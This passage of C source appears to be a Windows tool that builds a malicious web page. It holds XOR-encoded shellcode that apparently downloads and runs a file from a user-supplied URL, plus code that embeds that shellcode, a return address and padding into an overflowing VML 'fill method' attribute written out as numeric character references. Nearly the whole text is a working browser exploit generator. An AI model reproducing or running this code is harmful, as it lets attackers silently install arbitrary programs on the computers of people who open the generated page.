// then a XOR-0x99 decoder for the 316-byte body that follows it.
unsigned char sh4llcode[] =
"\x80\x44\x24\x2E\xC0\x80\x44\x24\x2F\xFF\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"

"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"
"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"
"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"
"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"
"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"
"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66"

"\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE"
"\xFC\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB"
"\xE0\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD"
"\xF1\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB"
"\xE0\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE"
"\xF7\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR: every two payload bytes become one UTF-16 code unit
// (low byte first), written as a decimal numeric character reference
void convert2ncr(unsigned char * buf, int size)
{
  int i=0;
  unsigned int ncr = 0;

  for(i=0; i<size; i+=2)
  {
    ncr = (buf[i+1] << 8) + buf[i];

    fprintf(fp, "&#%d;", ncr);
  }
}

void create(char* url)
{
  unsigned char buf[1024] = {0};
  int psize = 0;
  int i = 0;
  BYTE end = 0x80;   // terminator written after the URL

  fp = fopen("test.html", "w+b");

  if(!fp)
  {
    return;
  }

  // print html header
  fprintf(fp, "%s", header);
  fflush(fp);

  for(i=0; i<NOPSIZE; i++)
  {
    fprintf(fp, "A");
  }

  fflush(fp);

  // print shellcode
  memset(buf, 0x90, sizeof(buf));

  memcpy(buf, &ret, 4);
  psize = 4+8+0x10;

  memcpy(buf+psize, sh4llcode, sizeof(sh4llcode)-1);
  psize += sizeof(sh4llcode)-1;

  // the URL is appended as-is (outside the decoder's 0x99 region), then the 0x80 end marker
  memcpy(buf+psize, url, strlen(url));
  psize += strlen(url);

  memcpy(buf+psize, &end, 1);
  psize += 1;
  // print NCR
  convert2ncr(buf, psize);

  // print html footer
  fprintf(fp, "%s", footer);
  fflush(fp);
  fclose(fp);
}

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  DialogBox(hInstance,(LPCTSTR)IDD_DIALOG1,NULL,(DLGPROC)DialogProc);
  return 0;
}

INT_PTR CALLBACK DialogProc(HWND hwndDlg,UINT uMsg,WPARAM wParam,LPARAM lParam)
{
  switch (uMsg)
  {
    case WM_INITDIALOG:
        hdlg = hwndDlg;
        return TRUE;

    case WM_COMMAND:
        if (LOWORD(wParam) == IDOK)
        {
          char url[256];
          ZeroMemory(url,256);
          GetDlgItemText(hdlg,IDC_EDIT1,url,256);
          create(url);
          MessageBox(hwndDlg,"Done: test.html has been generated!","Notice",MB_ICONINFORMATION);
        }

        if (LOWORD(wParam) == IDCANCEL)
        {
          EndDialog(hwndDlg, LOWORD(wParam));
          PostQuitMessage(0);
        }
        break;
  }
  return 0;
}